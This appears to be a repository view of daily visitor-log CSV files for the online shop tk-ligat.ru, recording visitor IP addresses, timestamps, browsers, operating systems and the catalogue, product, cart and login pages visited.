46 46.165.16.184 1675589673 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/141-1.html
47 46.165.16.184 1675589708 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
48 46.165.16.184 1675589718 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/46-1.html
49 46.165.16.184 1675589772 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-24.html
50 46.165.16.184 1675589788 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/46-1.html
51 46.165.16.184 1675589800 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/142-1.html
52 46.165.16.184 1675589837 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-24.html
53 46.165.16.184 1675589902 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-24.html
54 46.165.16.184 1675589907 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-24.html
55 46.165.16.184 1675589924 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-16.html
56 46.165.16.184 1675589956 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
57 46.165.16.184 1675589968 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/3-1.html
58 46.165.16.184 1675590005 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/28706
59 46.165.16.184 1675590026 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/3-1.html
60 46.165.16.184 1675590034 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/144-1.html
61 46.165.16.184 1675590062 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-18.html
62 178.178.94.88 1675594384 Chrome 10+ Linux https://tk-ligat.ru/tovar_show/17516
63 95.161.221.77 1675595479 Chrome 10+ Windows https://tk-ligat.ru/
64 80.82.63.76 1675595529 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/5680
65 46.165.16.184 1675613175 Firefox 10+ Linux https://tk-ligat.ru/login/
66 46.165.16.184 1675614251 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-23.html
67 46.165.16.184 1675614391 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/122-1.html
68 46.165.16.184 1675614441 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/141-1.html
69 46.165.16.184 1675615691 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-23.html
70 46.165.16.184 1675618196 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/67-1.html
71 46.165.16.184 1675618200 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/41-1.html
72 46.165.16.184 1675618251 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/41-1.html
73 46.165.16.184 1675618260 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/41-1.html
74 46.165.16.184 1675618400 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/117-1.html
75 46.165.16.184 1675618413 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/117-1.html
76 46.165.16.184 1675618437 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
77 46.165.16.184 1675618456 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-14.html
78 46.165.16.184 1675618568 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
79 46.165.16.184 1675618575 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/3-1.html
80 46.165.16.184 1675618647 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-14.html
81 46.165.16.184 1675618700 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-14.html
82 46.165.16.184 1675618736 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-15.html
83 46.165.16.184 1675618819 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-16.html
84 46.165.16.184 1675618933 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-16.html
85 46.165.16.184 1675619056 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-17.html
86 46.165.16.184 1675619117 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-18.html
87 46.165.16.184 1675619137 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
88 46.165.16.184 1675619153 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/138-1.html
89 46.165.16.184 1675619165 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/133-1.html
90 46.165.16.184 1675619236 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/133-1.html
91 46.165.16.184 1675619243 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/150-1.html
92 46.165.16.184 1675619301 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/151-1.html
93 46.165.16.184 1675619307 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/151-1.html
94 46.165.16.184 1675619327 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-18.html
95 46.165.16.184 1675619346 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
96 46.165.16.184 1675619413 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/152-1.html
97 46.165.16.184 1675619423 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/152-1.html
98 46.165.16.184 1675619449 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
99 46.165.16.184 1675619466 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/124-1.html
100 46.165.16.184 1675619565 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/153-1.html
101 46.165.16.184 1675619576 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/153-1.html
102 46.165.16.184 1675619597 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/153-1.html
103 46.165.16.184 1675619675 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/153-1.html
104 46.165.16.184 1675619711 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/153-1.html
105 46.165.16.184 1675619727 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/153-1.html
106 46.165.16.184 1675619736 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/23785
107 46.165.16.184 1675619741 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/23785
108 46.165.16.184 1675619747 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/23785
109 46.165.16.184 1675619796 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/23785
110 46.165.16.184 1675619799 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/23785
111 46.165.16.184 1675619813 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/20803
112 46.165.16.184 1675619816 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/20803
113 46.165.16.184 1675619837 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/20803
114 46.165.16.184 1675619840 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/20803
115 46.165.16.184 1675619870 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-19.html
116 46.165.16.184 1675619894 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/30393
117 46.165.16.184 1675619910 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
118 46.165.16.184 1675619932 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/51-1.html
119 46.165.16.184 1675619945 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/62-1.html
120 46.165.16.184 1675620004 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/62-1.html
121 46.165.16.184 1675620035 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/62-3.html
122 46.165.16.184 1675620072 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/62-5.html
123 46.165.16.184 1675620093 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/30393
124 46.165.16.184 1675620106 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-19.html
125 46.165.16.184 1675620190 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-19.html
126 46.165.16.184 1675620201 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/154-1.html
127 46.165.16.184 1675620254 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
128 46.165.16.184 1675620282 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/152-1.html
129 46.165.16.184 1675620349 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/155-1.html
130 46.165.16.184 1675620362 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/155-1.html
131 46.165.16.184 1675620402 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-19.html
132 46.165.16.184 1675620421 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/155-1.html

View File

@ -0,0 +1,48 @@
46.165.16.184;1675652936;Chrome 10+;Linux;https://tk-ligat.ru/tovar_show/17516;
79.173.83.93;1675656565;Safari 10+;Mac OS;https://tk-ligat.ru/login/;
178.46.124.58;1675661517;Chrome 10+;Windows;https://tk-ligat.ru/;
178.46.124.58;1675661530;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/0-1.html;
178.46.124.58;1675661539;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/51-1.html;
178.46.124.58;1675661548;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/51-1.html;
178.46.124.58;1675661554;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/61-1.html;
178.46.124.58;1675682868;Chrome 10+;Windows;https://tk-ligat.ru/;
178.46.124.58;1675682872;Chrome 10+;Windows;https://tk-ligat.ru/;
178.46.124.58;1675682888;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.49.31;1675685747;Firefox 10+;Windows;https://tk-ligat.ru/tovar_show/33945;
46.165.16.184;1675695834;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/155-1.html;
46.165.16.184;1675695840;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/156-1.html;
46.165.16.184;1675695978;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-19.html;
46.165.16.184;1675695995;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675696005;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/128-1.html;
46.165.16.184;1675696103;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675696111;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/51-1.html;
46.165.16.184;1675696115;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/118-1.html;
46.165.16.184;1675696125;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/30392;
46.165.16.184;1675696167;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/118-1.html;
46.165.16.184;1675696172;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/118-1.html;
46.165.16.184;1675696180;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/128-1.html;
46.165.16.184;1675696234;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/61-1.html;
46.165.16.184;1675696242;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/61-1.html;
46.165.16.184;1675696246;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/128-1.html;
46.165.16.184;1675696275;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/128-1.html;
46.165.16.184;1675696284;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/128-1.html;
46.165.16.184;1675696313;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/128-1.html;
46.165.16.184;1675696321;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/128-1.html;
46.165.16.184;1675696337;Firefox 10+;Linux;https://tk-ligat.ru/tovar_show/31102;
46.165.16.184;1675696395;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675696411;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/128-1.html;
46.165.16.184;1675696479;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/128-1.html;
46.165.16.184;1675696491;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/157-1.html;
46.165.16.184;1675696542;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/157-1.html;
46.165.16.184;1675696553;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/157-1.html;
46.165.16.184;1675696584;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/0-19.html;
46.165.16.184;1675696645;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/157-1.html;
46.165.16.184;1675696662;Firefox 10+;Linux;https://tk-ligat.ru/tovar_cat/157-1.html;
46.165.16.184;1675697211;Firefox 10+;Linux;https://tk-ligat.ru/lk/;
46.165.16.184;1675704997;Chrome 10+;Linux;https://tk-ligat.ru/tovar_show/17516;
46.165.16.184;1675705029;Chrome 10+;Linux;https://tk-ligat.ru/tovar_show/18078;
46.165.16.184;1675705047;Chrome 10+;Linux;https://tk-ligat.ru/tovar_show/18078;
46.165.16.184;1675705069;Chrome 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675705206;Chrome 10+;Linux;https://tk-ligat.ru/tovar_cat/0-207.html;
46.165.16.184;1675705284;Chrome 10+;Linux;https://tk-ligat.ru/tovar_cat/0-7.html;
46.165.16.184;1675705317;Chrome 10+;Linux;https://tk-ligat.ru/tovar_show/31528;
1 46.165.16.184 1675652936 Chrome 10+ Linux https://tk-ligat.ru/tovar_show/17516
2 79.173.83.93 1675656565 Safari 10+ Mac OS https://tk-ligat.ru/login/
3 178.46.124.58 1675661517 Chrome 10+ Windows https://tk-ligat.ru/
4 178.46.124.58 1675661530 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/0-1.html
5 178.46.124.58 1675661539 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/51-1.html
6 178.46.124.58 1675661548 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/51-1.html
7 178.46.124.58 1675661554 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/61-1.html
8 178.46.124.58 1675682868 Chrome 10+ Windows https://tk-ligat.ru/
9 178.46.124.58 1675682872 Chrome 10+ Windows https://tk-ligat.ru/
10 178.46.124.58 1675682888 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/0-1.html
11 46.165.49.31 1675685747 Firefox 10+ Windows https://tk-ligat.ru/tovar_show/33945
12 46.165.16.184 1675695834 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/155-1.html
13 46.165.16.184 1675695840 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/156-1.html
14 46.165.16.184 1675695978 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-19.html
15 46.165.16.184 1675695995 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
16 46.165.16.184 1675696005 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/128-1.html
17 46.165.16.184 1675696103 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
18 46.165.16.184 1675696111 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/51-1.html
19 46.165.16.184 1675696115 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/118-1.html
20 46.165.16.184 1675696125 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/30392
21 46.165.16.184 1675696167 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/118-1.html
22 46.165.16.184 1675696172 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/118-1.html
23 46.165.16.184 1675696180 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/128-1.html
24 46.165.16.184 1675696234 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/61-1.html
25 46.165.16.184 1675696242 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/61-1.html
26 46.165.16.184 1675696246 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/128-1.html
27 46.165.16.184 1675696275 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/128-1.html
28 46.165.16.184 1675696284 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/128-1.html
29 46.165.16.184 1675696313 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/128-1.html
30 46.165.16.184 1675696321 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/128-1.html
31 46.165.16.184 1675696337 Firefox 10+ Linux https://tk-ligat.ru/tovar_show/31102
32 46.165.16.184 1675696395 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
33 46.165.16.184 1675696411 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/128-1.html
34 46.165.16.184 1675696479 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/128-1.html
35 46.165.16.184 1675696491 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/157-1.html
36 46.165.16.184 1675696542 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/157-1.html
37 46.165.16.184 1675696553 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/157-1.html
38 46.165.16.184 1675696584 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/0-19.html
39 46.165.16.184 1675696645 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/157-1.html
40 46.165.16.184 1675696662 Firefox 10+ Linux https://tk-ligat.ru/tovar_cat/157-1.html
41 46.165.16.184 1675697211 Firefox 10+ Linux https://tk-ligat.ru/lk/
42 46.165.16.184 1675704997 Chrome 10+ Linux https://tk-ligat.ru/tovar_show/17516
43 46.165.16.184 1675705029 Chrome 10+ Linux https://tk-ligat.ru/tovar_show/18078
44 46.165.16.184 1675705047 Chrome 10+ Linux https://tk-ligat.ru/tovar_show/18078
45 46.165.16.184 1675705069 Chrome 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
46 46.165.16.184 1675705206 Chrome 10+ Linux https://tk-ligat.ru/tovar_cat/0-207.html
47 46.165.16.184 1675705284 Chrome 10+ Linux https://tk-ligat.ru/tovar_cat/0-7.html
48 46.165.16.184 1675705317 Chrome 10+ Linux https://tk-ligat.ru/tovar_show/31528

View File

@ -0,0 +1,5 @@
46.165.16.184;1675786750;Firefox 10+;Linux;https://tk-ligat.ru/api/admin/19002;
46.165.16.184;1675786751;Firefox 10+;Linux;https://tk-ligat.ru/api/admin/19002;
46.165.16.184;1675790040;Chrome 10+;Linux;https://tk-ligat.ru/tovar_show/31528;
46.165.16.184;1675790056;Chrome 10+;Linux;https://tk-ligat.ru/tovar_show/23553;
46.165.16.184;1675790070;Chrome 10+;Linux;https://tk-ligat.ru/tovar_show/23553;
1 46.165.16.184 1675786750 Firefox 10+ Linux https://tk-ligat.ru/api/admin/19002
2 46.165.16.184 1675786751 Firefox 10+ Linux https://tk-ligat.ru/api/admin/19002
3 46.165.16.184 1675790040 Chrome 10+ Linux https://tk-ligat.ru/tovar_show/31528
4 46.165.16.184 1675790056 Chrome 10+ Linux https://tk-ligat.ru/tovar_show/23553
5 46.165.16.184 1675790070 Chrome 10+ Linux https://tk-ligat.ru/tovar_show/23553

View File

@ -0,0 +1,16 @@
82.195.16.173;1675829632;Chrome 10+;Windows;https://tk-ligat.ru/;
82.195.16.173;1675829682;Chrome 10+;Windows;https://tk-ligat.ru/new_find/;
82.195.16.173;1675829754;Chrome 10+;Windows;https://tk-ligat.ru/new_find/;
82.195.16.173;1675829840;Chrome 10+;Windows;https://tk-ligat.ru/new_find/;
82.195.16.173;1675829891;Chrome 10+;Windows;https://tk-ligat.ru/new_find/;
109.198.107.82;1675851373;Chrome 10+;Windows;https://tk-ligat.ru/;
109.198.107.82;1675851397;Chrome 10+;Windows;https://tk-ligat.ru/cart/;
109.198.107.82;1675851404;Chrome 10+;Windows;https://tk-ligat.ru/cart/;
109.198.107.82;1675851423;Chrome 10+;Windows;https://tk-ligat.ru/;
109.198.107.82;1675851454;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/0-1.html;
109.198.107.82;1675851510;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/75-1.html;
109.198.107.82;1675851555;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/105-1.html;
109.198.107.82;1675851613;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/137-1.html;
109.198.107.82;1675851648;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/0-1.html;
109.198.107.82;1675851746;Chrome 10+;Windows;https://tk-ligat.ru/new_find/;
109.198.107.82;1675851762;Chrome 10+;Windows;https://tk-ligat.ru/tovar_show/782;
1 82.195.16.173 1675829632 Chrome 10+ Windows https://tk-ligat.ru/
2 82.195.16.173 1675829682 Chrome 10+ Windows https://tk-ligat.ru/new_find/
3 82.195.16.173 1675829754 Chrome 10+ Windows https://tk-ligat.ru/new_find/
4 82.195.16.173 1675829840 Chrome 10+ Windows https://tk-ligat.ru/new_find/
5 82.195.16.173 1675829891 Chrome 10+ Windows https://tk-ligat.ru/new_find/
6 109.198.107.82 1675851373 Chrome 10+ Windows https://tk-ligat.ru/
7 109.198.107.82 1675851397 Chrome 10+ Windows https://tk-ligat.ru/cart/
8 109.198.107.82 1675851404 Chrome 10+ Windows https://tk-ligat.ru/cart/
9 109.198.107.82 1675851423 Chrome 10+ Windows https://tk-ligat.ru/
10 109.198.107.82 1675851454 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/0-1.html
11 109.198.107.82 1675851510 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/75-1.html
12 109.198.107.82 1675851555 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/105-1.html
13 109.198.107.82 1675851613 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/137-1.html
14 109.198.107.82 1675851648 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/0-1.html
15 109.198.107.82 1675851746 Chrome 10+ Windows https://tk-ligat.ru/new_find/
16 109.198.107.82 1675851762 Chrome 10+ Windows https://tk-ligat.ru/tovar_show/782

View File

@ -0,0 +1,11 @@
178.46.123.49;1674710753;Chrome 10+;Windows;https://tk-ligat.ru/;
178.46.123.49;1674710761;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/0-1.html;
178.46.123.49;1674710766;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/5-1.html;
178.46.123.49;1674710772;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/0-1.html;
178.46.123.49;1674710776;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/13-1.html;
66.249.93.100;1674713452;Chrome 90+;Mac OS;https://tk-ligat.ru/;
66.249.93.104;1674713452;Chrome 90+;Linux;https://tk-ligat.ru/;
66.249.93.108;1674713459;Chrome 90+;Mac OS;https://tk-ligat.ru/;
66.249.93.108;1674713460;Chrome 90+;Linux;https://tk-ligat.ru/;
66.249.93.100;1674713473;Chrome 90+;Linux;https://tk-ligat.ru/;
93.171.203.15;1674713492; ;Неизвестна;https://tk-ligat.ru/;
1 178.46.123.49 1674710753 Chrome 10+ Windows https://tk-ligat.ru/
2 178.46.123.49 1674710761 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/0-1.html
3 178.46.123.49 1674710766 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/5-1.html
4 178.46.123.49 1674710772 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/0-1.html
5 178.46.123.49 1674710776 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/13-1.html
6 66.249.93.100 1674713452 Chrome 90+ Mac OS https://tk-ligat.ru/
7 66.249.93.104 1674713452 Chrome 90+ Linux https://tk-ligat.ru/
8 66.249.93.108 1674713459 Chrome 90+ Mac OS https://tk-ligat.ru/
9 66.249.93.108 1674713460 Chrome 90+ Linux https://tk-ligat.ru/
10 66.249.93.100 1674713473 Chrome 90+ Linux https://tk-ligat.ru/
11 93.171.203.15 1674713492 Неизвестна https://tk-ligat.ru/

View File

@ -0,0 +1,16 @@
46.165.49.31;1674792566;Firefox 10+;Windows;https://tk-ligat.ru/;
178.46.123.49;1674798963;Chrome 10+;Windows;https://tk-ligat.ru/;
178.46.123.49;1674798968;Chrome 10+;Windows;https://tk-ligat.ru/cart/;
178.46.123.49;1674798998;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/0-1.html;
178.46.123.49;1674799005;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/35-1.html;
178.46.123.49;1674799016;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/36-1.html;
178.46.123.49;1674799036;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/0-1.html;
178.46.123.49;1674799041;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/5-1.html;
178.46.123.49;1674799049;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/72-1.html;
178.46.123.49;1674799060;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/72-2.html;
178.46.125.34;1674806423;Chrome 10+;Windows;https://tk-ligat.ru/;
178.46.125.34;1674806433;Chrome 10+;Windows;https://tk-ligat.ru/new_find/;
178.46.125.34;1674806458;Chrome 10+;Windows;https://tk-ligat.ru/new_find/;
178.46.125.34;1674806472;Chrome 10+;Windows;https://tk-ligat.ru/new_find/;
91.219.191.177;1674825972;Chrome 10+;Windows;https://tk-ligat.ru/login/;
79.173.90.87;1674825995;Chrome 10+;Windows;https://tk-ligat.ru/;
1 46.165.49.31 1674792566 Firefox 10+ Windows https://tk-ligat.ru/
2 178.46.123.49 1674798963 Chrome 10+ Windows https://tk-ligat.ru/
3 178.46.123.49 1674798968 Chrome 10+ Windows https://tk-ligat.ru/cart/
4 178.46.123.49 1674798998 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/0-1.html
5 178.46.123.49 1674799005 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/35-1.html
6 178.46.123.49 1674799016 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/36-1.html
7 178.46.123.49 1674799036 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/0-1.html
8 178.46.123.49 1674799041 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/5-1.html
9 178.46.123.49 1674799049 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/72-1.html
10 178.46.123.49 1674799060 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/72-2.html
11 178.46.125.34 1674806423 Chrome 10+ Windows https://tk-ligat.ru/
12 178.46.125.34 1674806433 Chrome 10+ Windows https://tk-ligat.ru/new_find/
13 178.46.125.34 1674806458 Chrome 10+ Windows https://tk-ligat.ru/new_find/
14 178.46.125.34 1674806472 Chrome 10+ Windows https://tk-ligat.ru/new_find/
15 91.219.191.177 1674825972 Chrome 10+ Windows https://tk-ligat.ru/login/
16 79.173.90.87 1674825995 Chrome 10+ Windows https://tk-ligat.ru/

View File

@ -0,0 +1,4 @@
46.165.16.184;1674888567;Firefox 10+;Linux;https://tk-ligat.ru/;
46.165.16.184;1674888574;Firefox 10+;Linux;https://tk-ligat.ru/cart/;
46.165.16.184;1674888612;Firefox 10+;Linux;https://tk-ligat.ru/lk/;
46.165.16.184;1674891447;Firefox 10+;Linux;https://tk-ligat.ru/lk/;
1 46.165.16.184 1674888567 Firefox 10+ Linux https://tk-ligat.ru/
2 46.165.16.184 1674888574 Firefox 10+ Linux https://tk-ligat.ru/cart/
3 46.165.16.184 1674888612 Firefox 10+ Linux https://tk-ligat.ru/lk/
4 46.165.16.184 1674891447 Firefox 10+ Linux https://tk-ligat.ru/lk/

View File

@ -0,0 +1,4 @@
95.161.221.44;1674957684;Chrome 10+;Windows;https://tk-ligat.ru/;
46.165.16.184;1674998519;Chrome 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675013051;Chrome 10+;Linux;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675013058;Chrome 10+;Linux;https://tk-ligat.ru/tovar_show/3560;
1 95.161.221.44 1674957684 Chrome 10+ Windows https://tk-ligat.ru/
2 46.165.16.184 1674998519 Chrome 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
3 46.165.16.184 1675013051 Chrome 10+ Linux https://tk-ligat.ru/tovar_cat/0-1.html
4 46.165.16.184 1675013058 Chrome 10+ Linux https://tk-ligat.ru/tovar_show/3560

View File

@ -0,0 +1,6 @@
88.83.200.226;1675034009;Chrome 10+;Windows;https://tk-ligat.ru/;
80.82.63.83;1675034015;Chrome 10+;Windows;https://tk-ligat.ru/login/;
94.140.136.191;1675082995;Chrome 10+;Windows;https://tk-ligat.ru/grekov-vagonka-kassa2.zip;
46.165.16.184;1675103614;Chrome 10+;Linux;https://tk-ligat.ru/tovar_show/3560;
79.173.83.15;1675112024;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/0-1.html;
95.161.239.148;1675112182;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/0-1.html;
1 88.83.200.226 1675034009 Chrome 10+ Windows https://tk-ligat.ru/
2 80.82.63.83 1675034015 Chrome 10+ Windows https://tk-ligat.ru/login/
3 94.140.136.191 1675082995 Chrome 10+ Windows https://tk-ligat.ru/grekov-vagonka-kassa2.zip
4 46.165.16.184 1675103614 Chrome 10+ Linux https://tk-ligat.ru/tovar_show/3560
5 79.173.83.15 1675112024 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/0-1.html
6 95.161.239.148 1675112182 Chrome 10+ Windows https://tk-ligat.ru/tovar_cat/0-1.html

View File

@ -0,0 +1,12 @@
178.46.124.58;1675150440;Chrome 10+;Windows;https://tk-ligat.ru/;
178.46.124.58;1675150460;Chrome 10+;Windows;https://tk-ligat.ru/tovar_cat/0-1.html;
46.165.16.184;1675174532;Firefox 10+;Linux;https://tk-ligat.ru/;
